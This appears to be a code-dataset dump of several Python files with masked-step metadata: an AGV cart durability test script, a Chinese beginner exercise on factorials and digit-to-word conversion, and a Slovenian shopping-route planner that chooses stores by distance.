func3(times,starts,seats):\n\tcurrent=starts\n\tcartId = \"CART9009\"\n\ttime.sleep(1)\n\tfor loop in range(0,times-1):\n\t\t# current=starts\n\t\ttip1=\"currentLoop is \"+loop.__str__()+\" currentStart is \"+current\n\t\tprint(tip1)\n\t\tfor i in range(0,len(seats)):\n\t\t\tnext = str(seats[i])\n\t\t\ttip2= \"currentLoop is \"+loop.__str__()+\"currentOrigin is \"+ current\t+ \"currentNext is \" + next +\" seatIndex is \"+i.__str__()\n\t\t\tprint(tip2)\n\t\t\tprint(\"excuting\")\n\t\t\tmove_cart(cartId,current,next)\n\t\t\tcurrent = next\ndef testPageAgvControl(jsonstr):\n\tjsonData = json.loads(jsonstr)\n\tresult = False\n\tif len(jsonData)==0:\n\t\tresult=False\n\telse:\n\t\tfor currentJson in jsonData:\n\t\t\tstart = currentJson[\"start\"]\n\t\t\tseat = currentJson[\"seat\"]\n\t\t\tloop=int(currentJson[\"loop\"])\n\t\t\tseats = str.split(seat, ',')\n\t\t\tdurabilityTestTask1 = threading.Thread(target=func3, args=[loop, start, seats])\n\t\t\tdurabilityTestTask1.start()\n\t\tresult=True\n\n\treturn result\n\ndef 
testtestPageAgvControl(jsonstr):\n\tjsonData = json.loads(jsonstr)\n\tresult = False\n\tif len(jsonData) == 0:\n\t\tresult = False\n\telse:\n\t\tfor currentJson in jsonData:\n\t\t\tstart = currentJson[\"start\"]\n\t\t\tprint(start)\n\t\t\ttime.sleep(3)\n\t\t\tseat = currentJson[\"seat\"]\n\t\t\tseats = str.split(seat, ',')\n\t\t\tprint(seat)\n\t\t\ttime.sleep(3)\n\t\t\tfor\tcurrentseat in seats:\n\t\t\t\tprint(currentseat)\n\t\t\t\ttime.sleep(3)\n\t\t\ttime.sleep(10)\n\t\tresult = True\n\n\treturn result\n\ndef testPageUnloockAll():\n\tapi.unlockAll();\n\ndef testProcess(jsonData):\n\tutility.start()\n\ttestPageAgvControl(jsonData)\n\tutility.finish()\n\n\n\ndef test1():\n\tInit()\n\t\n\tdurabilityTestTask1= threading.Thread(target=func3,args=[20,\"stockA_row1_col3\",[\"stockA_row1_col2\",\"stockA_row1_col4\"]])\n\tdurabilityTestTask1.start()\n\n\tdurabilityTestTask2= threading.Thread(target=func3,args=[20,\"stockA_row1_col2\",[\"seat2_1\",\"stockA_row4_col2\"]])\n\t# durabilityTestTask2.start()\n\n\tdurabilityTestTask3= threading.Thread(target=func3,args=[20,\"stockA_row5_col3\",[\"seat16_1\",\"stockA_row5_col2\"]])\n\t# durabilityTestTask3.start()\n\n\tdurabilityTestTask4= threading.Thread(target=func3,args=[20,\"stockA_row6_col3\",[\"seat12_1\",\"stockA_row6_col2\"]])\n\t# durabilityTestTask4.start()\n\n\tdurabilityTestTask1.join()\n\n\t\n\t#t1.join()\t\n\tprint(\"===============ALL FINISH ========================\")\n\n\n\n\nif __name__ == '__main__':\n\t# utility.run_tests()\n\tif sys.argv is not None and len(sys.argv)>0:\n\t\tif \"process\" in sys.argv:\n\t\t\tlog.info(\"run at testPage mode\")\n\t\t\targs=\"\"\n\t\t\twith open('/agvscada/driver/args.txt', 'r', encoding='utf-8') as f:\n\t\t\t\targs=f.read()\n\t\t\tapi.init()\n\t\t\ttime.sleep(3)\n\t\t\ttestPageAgvControl(args)\n\t\telif \"unlock\" in sys.argv:\n\t\t\ttestPageUnloockAll()\n\t\telif \"test\" in 
sys.argv:\n\t\t\tutility.start()\n\t\t\ttest1()\n\t\t\tutility.finish()\n\n\n\n\telse:\n\t\tutility.start()\n\t\ttestgetPoint()\n\t\tutility.finish()\n\t# test3()\n\t\n\t\n\t\n\t\n",
"step-ids": [
26,
29,
30,
34,
38
]
}
|
[
26,
29,
30,
34,
38
] |
# -*- coding: utf-8 -*-
# @Time : 2020/6/12 20:19
# @Author : damon
# @Site :
# @File : work0612
# @Software: PyCharm
import math
"""
1、给定n=10,计算1! + 2! + 3! + ... + n!的值
"""
# Solution 1: build each factorial incrementally and accumulate the total.
n = 10
factorial = 1
total = 0  # renamed from `sum`, which shadowed the built-in sum()
for i in range(1, n + 1):
    factorial = i * factorial  # i! = i * (i-1)!
    total += factorial
print(f"阶乘之和{total}")
# Solution 2: let math.factorial compute each term.
sum1 = 0
n = 10
for k in range(1, n + 1):
    F = math.factorial(k)
    sum1 = sum1 + F
print(f"阶乘之和{sum1}")
"""
2、给一个数字字符串13543897565,把每一位对应的数字转换成英文数字(例如:“123” -> "one-two-three")
"""
digits = '13543897565'  # renamed from `str`, which shadowed the built-in type

# Digit value -> English word lookup, built once and shared by f() below
# (the original rebuilt the dict on every call).
DIGIT_WORDS = {0: "zero", 1: "one", 2: "two", 3: "three", 4: "four",
               5: "five", 6: "six", 7: "seven", 8: "eight", 9: "nine"}


def f(a):
    """Print and return the digit string *a* spelled out in English.

    Example: f("123") prints and returns "one-two-three".
    Raises ValueError if *a* contains a non-digit character, matching the
    original int() conversion behaviour.
    """
    words = "-".join(DIGIT_WORDS[int(ch)] for ch in a)
    print(words)
    return words  # returning the result is new but backward-compatible


f(digits)
str1 = '13543897565'


def fa(x):
    """Return the English word for a single digit (given as str or int)."""
    besede = {0: "zero", 1: "one", 2: "two", 3: "three", 4: "four",
              5: "five", 6: "six", 7: "seven", 8: "eight", 9: "nine"}
    return besede[int(x)]


# Translate every digit of str1 and join the words with dashes.
r = map(fa, str1)
print('-'.join(r))
"""
3、我的关注列表follow_list = {"status":"ok","data":{"follow_list":[{"user_id":"32804516","nickname":"羽秋璃1111233","is_friend":0,"is_vip":1},{"user_id":"35742446","nickname":"我是你的宝贝哦","is_friend":1,"is_vip":1},{"user_id":"264844","nickname":"大鱼噢大鱼","is_friend":0,"is_vip":1},{"user_id":"34362681","nickname":"薛一十三","is_friend":0,"is_vip":0}]}}
(1)如果用户是vip,对用户说“土豪xxx,我关注了你,给个打赏吧”(xxx是用户昵称)
(2)如果用户不是好友关系但是vip(is_friend=0, is_vip=1),对用户说“土豪xxx,我关注了你,给个好友位吧”
"""
follow_list = {
    "status": "ok",
    "data": {"follow_list": [
        {"user_id": "32804516", "nickname": "羽秋璃1111233", "is_friend": 0, "is_vip": 1},
        {"user_id": "35742446", "nickname": "我是你的宝贝哦", "is_friend": 1, "is_vip": 1},
        {"user_id": "264844", "nickname": "大鱼噢大鱼", "is_friend": 0, "is_vip": 1},
        {"user_id": "34362681", "nickname": "薛一十三", "is_friend": 0, "is_vip": 0},
    ]},
}

users = follow_list['data']['follow_list']

# (1) Every VIP gets the tip request.
for user in users:
    if user['is_vip'] == 1:
        print(f"土豪{user['nickname']},我关注了你,给我打赏吧")

# (2) VIPs who are not yet friends get the friend-slot request.
for user in users:
    if user['is_vip'] == 1 and user['is_friend'] == 0:
        print(f"土豪{user['nickname']},我关注了你,给个好友位吧")
|
normal
|
{
"blob_id": "af9adc0faad4fc1426a2bd75c1c77e23e37b60bf",
"index": 2431,
"step-1": "<mask token>\n\n\ndef fa(x):\n dict2 = {(1): 'one', (2): 'two', (3): 'three', (4): 'four', (5): 'five',\n (6): 'six', (7): 'seven', (8): 'eight', (9): 'nine', (0): 'zero'}\n return dict2[int(x)]\n\n\n<mask token>\n",
"step-2": "<mask token>\nfor i in range(1, n + 1):\n factorial = i * factorial\n sum += factorial\nprint(f'阶乘之和{sum}')\n<mask token>\nfor i in range(1, n + 1):\n F = math.factorial(i)\n sum1 += F\nprint(f'阶乘之和{sum1}')\n<mask token>\n\n\ndef f(a):\n list1 = []\n dict1 = {(1): 'one', (2): 'two', (3): 'three', (4): 'four', (5): 'five',\n (6): 'six', (7): 'seven', (8): 'eight', (9): 'nine', (0): 'zero'}\n for i in list(a):\n list1.append(dict1[int(i)])\n print('-'.join(list1))\n\n\nf(str)\n<mask token>\n\n\ndef fa(x):\n dict2 = {(1): 'one', (2): 'two', (3): 'three', (4): 'four', (5): 'five',\n (6): 'six', (7): 'seven', (8): 'eight', (9): 'nine', (0): 'zero'}\n return dict2[int(x)]\n\n\n<mask token>\nprint('-'.join(r))\n<mask token>\nfor x in follow_list['data']['follow_list']:\n if x['is_vip'] == 1:\n print(f\"土豪{x['nickname']},我关注了你,给我打赏吧\")\nfor x in follow_list['data']['follow_list']:\n if x['is_vip'] == 1 and x['is_friend'] == 0:\n print(f\"土豪{x['nickname']},我关注了你,给个好友位吧\")\n",
"step-3": "<mask token>\nn = 10\nfactorial = 1\nsum = 0\nfor i in range(1, n + 1):\n factorial = i * factorial\n sum += factorial\nprint(f'阶乘之和{sum}')\nsum1 = 0\nn = 10\nfor i in range(1, n + 1):\n F = math.factorial(i)\n sum1 += F\nprint(f'阶乘之和{sum1}')\n<mask token>\nstr = '13543897565'\n\n\ndef f(a):\n list1 = []\n dict1 = {(1): 'one', (2): 'two', (3): 'three', (4): 'four', (5): 'five',\n (6): 'six', (7): 'seven', (8): 'eight', (9): 'nine', (0): 'zero'}\n for i in list(a):\n list1.append(dict1[int(i)])\n print('-'.join(list1))\n\n\nf(str)\nstr1 = '13543897565'\n\n\ndef fa(x):\n dict2 = {(1): 'one', (2): 'two', (3): 'three', (4): 'four', (5): 'five',\n (6): 'six', (7): 'seven', (8): 'eight', (9): 'nine', (0): 'zero'}\n return dict2[int(x)]\n\n\nr = map(fa, list(str1))\nprint('-'.join(r))\n<mask token>\nfollow_list = {'status': 'ok', 'data': {'follow_list': [{'user_id':\n '32804516', 'nickname': '羽秋璃1111233', 'is_friend': 0, 'is_vip': 1}, {\n 'user_id': '35742446', 'nickname': '我是你的宝贝哦', 'is_friend': 1, 'is_vip':\n 1}, {'user_id': '264844', 'nickname': '大鱼噢大鱼', 'is_friend': 0, 'is_vip':\n 1}, {'user_id': '34362681', 'nickname': '薛一十三', 'is_friend': 0,\n 'is_vip': 0}]}}\nfor x in follow_list['data']['follow_list']:\n if x['is_vip'] == 1:\n print(f\"土豪{x['nickname']},我关注了你,给我打赏吧\")\nfor x in follow_list['data']['follow_list']:\n if x['is_vip'] == 1 and x['is_friend'] == 0:\n print(f\"土豪{x['nickname']},我关注了你,给个好友位吧\")\n",
"step-4": "import math\n<mask token>\nn = 10\nfactorial = 1\nsum = 0\nfor i in range(1, n + 1):\n factorial = i * factorial\n sum += factorial\nprint(f'阶乘之和{sum}')\nsum1 = 0\nn = 10\nfor i in range(1, n + 1):\n F = math.factorial(i)\n sum1 += F\nprint(f'阶乘之和{sum1}')\n<mask token>\nstr = '13543897565'\n\n\ndef f(a):\n list1 = []\n dict1 = {(1): 'one', (2): 'two', (3): 'three', (4): 'four', (5): 'five',\n (6): 'six', (7): 'seven', (8): 'eight', (9): 'nine', (0): 'zero'}\n for i in list(a):\n list1.append(dict1[int(i)])\n print('-'.join(list1))\n\n\nf(str)\nstr1 = '13543897565'\n\n\ndef fa(x):\n dict2 = {(1): 'one', (2): 'two', (3): 'three', (4): 'four', (5): 'five',\n (6): 'six', (7): 'seven', (8): 'eight', (9): 'nine', (0): 'zero'}\n return dict2[int(x)]\n\n\nr = map(fa, list(str1))\nprint('-'.join(r))\n<mask token>\nfollow_list = {'status': 'ok', 'data': {'follow_list': [{'user_id':\n '32804516', 'nickname': '羽秋璃1111233', 'is_friend': 0, 'is_vip': 1}, {\n 'user_id': '35742446', 'nickname': '我是你的宝贝哦', 'is_friend': 1, 'is_vip':\n 1}, {'user_id': '264844', 'nickname': '大鱼噢大鱼', 'is_friend': 0, 'is_vip':\n 1}, {'user_id': '34362681', 'nickname': '薛一十三', 'is_friend': 0,\n 'is_vip': 0}]}}\nfor x in follow_list['data']['follow_list']:\n if x['is_vip'] == 1:\n print(f\"土豪{x['nickname']},我关注了你,给我打赏吧\")\nfor x in follow_list['data']['follow_list']:\n if x['is_vip'] == 1 and x['is_friend'] == 0:\n print(f\"土豪{x['nickname']},我关注了你,给个好友位吧\")\n",
"step-5": "# -*- coding: utf-8 -*-\n# @Time : 2020/6/12 20:19\n# @Author : damon\n# @Site : \n# @File : work0612\n# @Software: PyCharm\n\n\nimport math\n\n\n\"\"\"\n1、给定n=10,计算1! + 2! + 3! + ... + n!的值\n\"\"\"\n# 解法1:\nn = 10\nfactorial = 1\nsum = 0\nfor i in range(1, n+1):\n factorial = i * factorial\n sum += factorial\nprint(f\"阶乘之和{sum}\")\n\n# 解法2:\nsum1 = 0\nn = 10\nfor i in range(1, n + 1):\n F = math.factorial(i)\n sum1 += F\nprint(f\"阶乘之和{sum1}\")\n\n\n\"\"\"\n2、给一个数字字符串13543897565,把每一位对应的数字转换成英文数字(例如:“123” -> \"one-two-three\")\n\"\"\"\nstr = '13543897565'\n\n\ndef f(a):\n list1 = []\n dict1 = {1: \"one\", 2: \"two\", 3: \"three\", 4: \"four\", 5: \"five\", 6: \"six\", 7: \"seven\", 8: \"eight\", 9: \"nine\", 0: \"zero\"}\n for i in list(a):\n list1.append(dict1[int(i)])\n print(\"-\".join(list1))\n\n\nf(str)\n\n\nstr1 = '13543897565'\n\n\ndef fa(x):\n dict2 = {1: \"one\", 2: \"two\", 3: \"three\", 4: \"four\", 5: \"five\",\n 6: \"six\", 7: \"seven\", 8: \"eight\", 9: \"nine\", 0: \"zero\"}\n return dict2[int(x)]\n\n\nr = map(fa, list(str1))\nprint('-'.join(r))\n\n\n\n\"\"\"\n3、我的关注列表follow_list = {\"status\":\"ok\",\"data\":{\"follow_list\":[{\"user_id\":\"32804516\",\"nickname\":\"羽秋璃1111233\",\"is_friend\":0,\"is_vip\":1},{\"user_id\":\"35742446\",\"nickname\":\"我是你的宝贝哦\",\"is_friend\":1,\"is_vip\":1},{\"user_id\":\"264844\",\"nickname\":\"大鱼噢大鱼\",\"is_friend\":0,\"is_vip\":1},{\"user_id\":\"34362681\",\"nickname\":\"薛一十三\",\"is_friend\":0,\"is_vip\":0}]}}\n(1)如果用户是vip,对用户说“土豪xxx,我关注了你,给个打赏吧”(xxx是用户昵称)\n(2)如果用户不是好友关系但是vip(is_friend=0, is_vip=1),对用户说“土豪xxx,我关注了你,给个好友位吧”\n\"\"\"\nfollow_list = {\"status\":\"ok\",\"data\":{\"follow_list\":[\n {\"user_id\":\"32804516\",\"nickname\":\"羽秋璃1111233\",\"is_friend\":0,\"is_vip\":1},\n {\"user_id\":\"35742446\",\"nickname\":\"我是你的宝贝哦\",\"is_friend\":1,\"is_vip\":1},\n {\"user_id\":\"264844\",\"nickname\":\"大鱼噢大鱼\",\"is_friend\":0,\"is_vip\":1},\n 
{\"user_id\":\"34362681\",\"nickname\":\"薛一十三\",\"is_friend\":0,\"is_vip\":0}]}}\n\nfor x in follow_list['data']['follow_list']:\n if x['is_vip'] == 1:\n print(f\"土豪{x['nickname']},我关注了你,给我打赏吧\")\n\nfor x in follow_list['data']['follow_list']:\n if x['is_vip'] == 1 and x['is_friend'] == 0:\n print(f\"土豪{x['nickname']},我关注了你,给个好友位吧\")\n",
"step-ids": [
1,
3,
4,
5,
6
]
}
|
[
1,
3,
4,
5,
6
] |
import itertools
import numpy
import math
import psycopg2
import podatki
# Module-level state loaded from the podatki data-access layer at import time.
baza = podatki.baza  # shared DB connection (psycopg2 is imported above) — presumably open
dom = podatki.preberi_lokacijo()  # home location; assumed an (x, y) pair — TODO confirm
seznam_trgovin =["spar", "mercator", "tus", "hofer", "lidl"]  # supported store chains
id_in_opis = podatki.id_izdelka_v_opis()  # rows pairing each product with its description
seznam_izdelkov = [el[0] for el in id_in_opis]  # e.g. ['cokolada', 'sladoled', ...]
mnozica_izdelkov = set(seznam_izdelkov)
trgovine_z_izdelki = podatki.trgovine_z_izdelki_f()  # dict: {'trgovina': ['id1', 'id2'], ...}
seznam_izdelkov_v_kosarici = [el[3] for el in podatki.kosarica]  # product ids in the basket
'''
def zemljevid_trgovin(trgovine):
sez = []
for trgovina in trgovine:
sez.append([trgovina, [])
def kombinacije_trgovin(seznam_izdelkov):
sez_kombinacij = []
for trgovina in trgovine:
kombinacija = []
izdelki = sez_izdelkov
for izdelek in izdelki:
if izdelek in trgovina:
izdelki = izdelki.remove(izdelek)
'''
def kombinacije_trgovin_f(mnozica_izdelkov_v_kosarici, seznam_trgovin, trgovine_z_izdelki):
    """Return the minimal store combinations that together stock every basket item.

    Enumerates every subset of ``seznam_trgovin`` (via a 0/1 mask product),
    keeps the subsets whose pooled stock covers
    ``mnozica_izdelkov_v_kosarici``, and finally drops every combination
    that is a proper superset of another valid one, so only minimal
    combinations remain.

    Returns a list of sets of store names (possibly containing the empty
    set when the basket itself is empty).
    """
    generator_kombinacij = (set(itertools.compress(seznam_trgovin, el))
                            for el in itertools.product(*[[0, 1]] * len(seznam_trgovin)))
    kombinacije = []
    for mnozica_trgovin in generator_kombinacij:
        # Pool every item available anywhere in this subset of stores.
        izdelki_kombinacije = set()
        for trgovina in mnozica_trgovin:
            izdelki_kombinacije.update(trgovine_z_izdelki[trgovina])
        if mnozica_izdelkov_v_kosarici.issubset(izdelki_kombinacije):
            kombinacije.append(mnozica_trgovin)
    # Keep only minimal combinations.  The original removed elements from the
    # list while iterating it (twice, as a workaround), which could still
    # leave supersets behind, and ended with an unreachable `return None`;
    # this filter is complete and side-effect free.
    return [k for k in kombinacije if not any(d < k for d in kombinacije)]
def razdalja(vozlisce1, vozlisce2):
    """Euclidean distance between two points given as (x, y) pairs.

    Uses math.hypot, which avoids the intermediate overflow/underflow that
    the naive sqrt(dx**2 + dy**2) formula can suffer for extreme coordinates.
    """
    return math.hypot(vozlisce2[0] - vozlisce1[0], vozlisce2[1] - vozlisce1[1])
#dom = [x,y]
def doloci_trgovine(dom, slovar_koordinat, seznam_izdelkov, kombinacija):
    """Enumerate tours dom -> one location per store chain -> dom; return the shortest.

    For every choice of one concrete location per chain in ``kombinacija``
    the tour length is accumulated with razdalja(); the shortest candidate
    is returned as ``[[dom, loc1, ...], dolzina]``.  Returns None (after
    printing a message) when no candidate tour could be built.

    NOTE(review): ``dolzina`` is zeroed after each appended path but the
    prefix distances are not restored for the next sibling location, so
    every candidate after the first inside an inner loop appears to get an
    understated length — confirm intent before relying on the comparison.
    """
    skupine = []  # one list of concrete locations per store chain in kombinacija
    poti = []  # candidate tours: [[dom, loc, ...], dolzina]
    for trgovina in kombinacija:
        skupine.append(podatki.lokacije(slovar_koordinat, trgovina))
    # Hand-unrolled nesting over one location per chain; handles at most
    # five chains (matching the five known store chains) — a sixth chain
    # would be silently ignored.
    for i in skupine[0]:  # skupine[0] is the location list of the first chain
        dolzina = razdalja(dom, i)
        if len(kombinacija) > 1:
            for j in skupine[1]:
                dolzina += razdalja(i, j)
                if len(kombinacija) > 2:
                    for k in skupine[2]:
                        dolzina += razdalja(j, k)
                        if len(kombinacija) > 3:
                            for m in skupine[3]:
                                dolzina += razdalja(k, m)
                                if len(kombinacija) > 4:
                                    for n in skupine[4]:
                                        dolzina += razdalja(m, n)
                                        dolzina += razdalja(n, dom)  # close the tour back home
                                        poti.append([[dom, i, j, k, m, n], dolzina])
                                        dolzina = 0
                                else:
                                    dolzina += razdalja(m, dom)
                                    poti.append([[dom, i, j, k, m], dolzina])
                                    dolzina = 0
                        else:
                            dolzina += razdalja(k, dom)
                            poti.append([[dom, i, j, k], dolzina])
                            dolzina = 0
                else:
                    dolzina += razdalja(j, dom)
                    poti.append([[dom, i, j], dolzina])
                    dolzina = 0
        else:
            # Single-store tour: out and straight back.
            dolzina *= 2
            poti.append([[dom, i], dolzina])
            dolzina = 0
    dolzine = [el[1] for el in poti]
    if dolzine == []:
        print("Nakupa ni mogoče opraviti.")  # "The purchase cannot be made."
        return None
    mini = numpy.argmin(dolzine)
    return poti[mini]  # [[path], length]
    # NOTE(review): the line below is unreachable dead code and
    # `sez_vozlisc` is undefined — safe to delete.
    return (dolzina, sez_vozlisc)
def doloci_pot(dom, seznam_izdelkov, seznam_trgovin, seznam_izdelkov_v_kosarici, trgovine_z_izdelki):
    """Pick the overall shortest route among all feasible store combinations.

    Evaluates every minimal combination returned by kombinacije_trgovin_f(),
    asks doloci_trgovine() for its best concrete tour, and returns the pair
    ``(pot, obiskane_trgovine)`` for the shortest one, with ``dom`` appended
    to close the path.  Returns None when no combination is feasible.
    """
    kandidati_poti = []
    kandidati_dolzin = []
    kandidati_trgovin = []
    mozne = kombinacije_trgovin_f(set(seznam_izdelkov_v_kosarici),
                                  seznam_trgovin, trgovine_z_izdelki)
    for kombinacija in mozne:
        par = doloci_trgovine(dom, slovar_koordinat, seznam_izdelkov, kombinacija)
        kandidati_dolzin.append(par[1])
        kandidati_poti.append(par[0])
        kandidati_trgovin.append(kombinacija)
    if not kandidati_dolzin:
        return None
    # Index of the first shortest candidate (same choice as numpy.argmin).
    najboljsi = min(range(len(kandidati_dolzin)), key=kandidati_dolzin.__getitem__)
    v = kandidati_poti[najboljsi]
    v.append(dom)  # close the tour back at home
    return v, kandidati_trgovin[najboljsi]
def razporeditev(obiskane_trgovine, izdelki, slovar):
    """Assign each basket item to the first visited store that stocks it.

    Returns ``[[trgovina, [opis, ...]], ...]`` in visit order, where each
    opis comes from podatki.id_izdelka_v_opis() (fetched once, not once per
    item as before).  Each item is assigned to at most one store: the
    original iterated the full item list for every store and called
    ``izdelki2.remove`` again for already-removed items, raising ValueError
    whenever two visited stores both stocked the same item.
    """
    opisi = podatki.id_izdelka_v_opis()  # hoisted out of the loops
    preostali = izdelki.copy()  # items not yet assigned to a store
    razpored = []  # local renamed: it previously shadowed the function name
    for trgovina in obiskane_trgovine:
        sez = []
        for izdelek in list(preostali):  # snapshot: preostali is mutated below
            if izdelek in slovar[trgovina]:
                sez.append(opisi[izdelek - 1])
                preostali.remove(izdelek)
        razpored.append([trgovina, sez])
    return razpored
# Script driver: compute the best shopping route for the current basket.
baza.commit()  # commit the current DB transaction opened by the podatki layer
slovar_koordinat = podatki.slovar_koordinat  # coordinates of every store location
kombinacije_trgovin = kombinacije_trgovin_f(set(seznam_izdelkov_v_kosarici), seznam_trgovin, trgovine_z_izdelki)
# print(kombinacije_trgovin)  # debug output (disabled)
# NOTE(review): doloci_pot may return None when the basket cannot be covered;
# this unpacking would then raise TypeError — consider guarding.
pot, obiskane_trgovine = doloci_pot(dom, seznam_izdelkov, seznam_trgovin, seznam_izdelkov_v_kosarici, trgovine_z_izdelki)
razpredelnica = razporeditev(obiskane_trgovine, seznam_izdelkov_v_kosarici, podatki.trgovine_z_izdelki)
|
normal
|
{
"blob_id": "5a0702dd869862ebc27c83d10e0b1f0575de68a7",
"index": 2944,
"step-1": "<mask token>\n\n\ndef kombinacije_trgovin_f(mnozica_izdelkov_v_kosarici, seznam_trgovin,\n trgovine_z_izdelki):\n generator_kombinacij = (set(itertools.compress(seznam_trgovin, el)) for\n el in itertools.product(*([[0, 1]] * len(seznam_trgovin))))\n kombinacije = []\n for mnozica_trgovin in generator_kombinacij:\n izdelki_kombinacije = set()\n for trgovina in mnozica_trgovin:\n for izdelek in trgovine_z_izdelki[trgovina]:\n izdelki_kombinacije.add(izdelek)\n if mnozica_izdelkov_v_kosarici.issubset(izdelki_kombinacije):\n kombinacije.append(mnozica_trgovin)\n for kombinacija in kombinacije:\n for kombinacija2 in kombinacije:\n if kombinacija.issubset(kombinacija2\n ) and kombinacija != kombinacija2:\n kombinacije.remove(kombinacija2)\n elif kombinacija2.issubset(kombinacija\n ) and kombinacija != kombinacija2:\n kombinacije.remove(kombinacija)\n for kombinacija in kombinacije:\n for kombinacija2 in kombinacije:\n if kombinacija.issubset(kombinacija2\n ) and kombinacija != kombinacija2:\n kombinacije.remove(kombinacija2)\n elif kombinacija2.issubset(kombinacija\n ) and kombinacija != kombinacija2:\n kombinacije.remove(kombinacija)\n return kombinacije\n return None\n\n\ndef razdalja(vozlisce1, vozlisce2):\n return math.sqrt((vozlisce2[1] - vozlisce1[1]) ** 2 + (vozlisce2[0] -\n vozlisce1[0]) ** 2)\n\n\n<mask token>\n\n\ndef doloci_pot(dom, seznam_izdelkov, seznam_trgovin,\n seznam_izdelkov_v_kosarici, trgovine_z_izdelki):\n vozlisca = []\n dolzine = []\n trgovine = []\n for kombinacija in kombinacije_trgovin_f(set(seznam_izdelkov_v_kosarici\n ), seznam_trgovin, trgovine_z_izdelki):\n par = doloci_trgovine(dom, slovar_koordinat, seznam_izdelkov,\n kombinacija)\n dolzine.append(par[1])\n vozlisca.append(par[0])\n trgovine.append(kombinacija)\n if dolzine == []:\n return None\n i = numpy.argmin(dolzine)\n v = vozlisca[i]\n v.append(dom)\n obiskane_trgovine = trgovine[i]\n return v, obiskane_trgovine\n\n\ndef razporeditev(obiskane_trgovine, izdelki, slovar):\n 
izdelki2 = izdelki.copy()\n razporeditev = []\n for trgovina in obiskane_trgovine:\n sez = []\n for izdelek in izdelki:\n if {izdelek}.issubset(slovar[trgovina]):\n izd = podatki.id_izdelka_v_opis()[izdelek - 1]\n sez.append(izd)\n izdelki2.remove(izdelek)\n razporeditev.append([trgovina, sez])\n return razporeditev\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef kombinacije_trgovin_f(mnozica_izdelkov_v_kosarici, seznam_trgovin,\n trgovine_z_izdelki):\n generator_kombinacij = (set(itertools.compress(seznam_trgovin, el)) for\n el in itertools.product(*([[0, 1]] * len(seznam_trgovin))))\n kombinacije = []\n for mnozica_trgovin in generator_kombinacij:\n izdelki_kombinacije = set()\n for trgovina in mnozica_trgovin:\n for izdelek in trgovine_z_izdelki[trgovina]:\n izdelki_kombinacije.add(izdelek)\n if mnozica_izdelkov_v_kosarici.issubset(izdelki_kombinacije):\n kombinacije.append(mnozica_trgovin)\n for kombinacija in kombinacije:\n for kombinacija2 in kombinacije:\n if kombinacija.issubset(kombinacija2\n ) and kombinacija != kombinacija2:\n kombinacije.remove(kombinacija2)\n elif kombinacija2.issubset(kombinacija\n ) and kombinacija != kombinacija2:\n kombinacije.remove(kombinacija)\n for kombinacija in kombinacije:\n for kombinacija2 in kombinacije:\n if kombinacija.issubset(kombinacija2\n ) and kombinacija != kombinacija2:\n kombinacije.remove(kombinacija2)\n elif kombinacija2.issubset(kombinacija\n ) and kombinacija != kombinacija2:\n kombinacije.remove(kombinacija)\n return kombinacije\n return None\n\n\ndef razdalja(vozlisce1, vozlisce2):\n return math.sqrt((vozlisce2[1] - vozlisce1[1]) ** 2 + (vozlisce2[0] -\n vozlisce1[0]) ** 2)\n\n\ndef doloci_trgovine(dom, slovar_koordinat, seznam_izdelkov, kombinacija):\n skupine = []\n poti = []\n for trgovina in kombinacija:\n skupine.append(podatki.lokacije(slovar_koordinat, trgovina))\n for i in skupine[0]:\n dolzina = razdalja(dom, i)\n if len(kombinacija) > 1:\n for j in skupine[1]:\n dolzina += razdalja(i, j)\n if len(kombinacija) > 2:\n for k in skupine[2]:\n dolzina += razdalja(j, k)\n if len(kombinacija) > 3:\n for m in skupine[3]:\n dolzina += razdalja(k, m)\n if len(kombinacija) > 4:\n for n in skupine[4]:\n dolzina += razdalja(m, n)\n dolzina += razdalja(n, dom)\n poti.append([[dom, i, j, k, m, n], dolzina]\n )\n dolzina = 0\n else:\n 
dolzina += razdalja(m, dom)\n poti.append([[dom, i, j, k, m], dolzina])\n dolzina = 0\n else:\n dolzina += razdalja(k, dom)\n poti.append([[dom, i, j, k], dolzina])\n dolzina = 0\n else:\n dolzina += razdalja(j, dom)\n poti.append([[dom, i, j], dolzina])\n dolzina = 0\n else:\n dolzina *= 2\n poti.append([[dom, i], dolzina])\n dolzina = 0\n dolzine = [el[1] for el in poti]\n if dolzine == []:\n print('Nakupa ni mogoče opraviti.')\n return None\n mini = numpy.argmin(dolzine)\n return poti[mini]\n return dolzina, sez_vozlisc\n\n\ndef doloci_pot(dom, seznam_izdelkov, seznam_trgovin,\n seznam_izdelkov_v_kosarici, trgovine_z_izdelki):\n vozlisca = []\n dolzine = []\n trgovine = []\n for kombinacija in kombinacije_trgovin_f(set(seznam_izdelkov_v_kosarici\n ), seznam_trgovin, trgovine_z_izdelki):\n par = doloci_trgovine(dom, slovar_koordinat, seznam_izdelkov,\n kombinacija)\n dolzine.append(par[1])\n vozlisca.append(par[0])\n trgovine.append(kombinacija)\n if dolzine == []:\n return None\n i = numpy.argmin(dolzine)\n v = vozlisca[i]\n v.append(dom)\n obiskane_trgovine = trgovine[i]\n return v, obiskane_trgovine\n\n\ndef razporeditev(obiskane_trgovine, izdelki, slovar):\n izdelki2 = izdelki.copy()\n razporeditev = []\n for trgovina in obiskane_trgovine:\n sez = []\n for izdelek in izdelki:\n if {izdelek}.issubset(slovar[trgovina]):\n izd = podatki.id_izdelka_v_opis()[izdelek - 1]\n sez.append(izd)\n izdelki2.remove(izdelek)\n razporeditev.append([trgovina, sez])\n return razporeditev\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef kombinacije_trgovin_f(mnozica_izdelkov_v_kosarici, seznam_trgovin,\n trgovine_z_izdelki):\n generator_kombinacij = (set(itertools.compress(seznam_trgovin, el)) for\n el in itertools.product(*([[0, 1]] * len(seznam_trgovin))))\n kombinacije = []\n for mnozica_trgovin in generator_kombinacij:\n izdelki_kombinacije = set()\n for trgovina in mnozica_trgovin:\n for izdelek in trgovine_z_izdelki[trgovina]:\n izdelki_kombinacije.add(izdelek)\n if mnozica_izdelkov_v_kosarici.issubset(izdelki_kombinacije):\n kombinacije.append(mnozica_trgovin)\n for kombinacija in kombinacije:\n for kombinacija2 in kombinacije:\n if kombinacija.issubset(kombinacija2\n ) and kombinacija != kombinacija2:\n kombinacije.remove(kombinacija2)\n elif kombinacija2.issubset(kombinacija\n ) and kombinacija != kombinacija2:\n kombinacije.remove(kombinacija)\n for kombinacija in kombinacije:\n for kombinacija2 in kombinacije:\n if kombinacija.issubset(kombinacija2\n ) and kombinacija != kombinacija2:\n kombinacije.remove(kombinacija2)\n elif kombinacija2.issubset(kombinacija\n ) and kombinacija != kombinacija2:\n 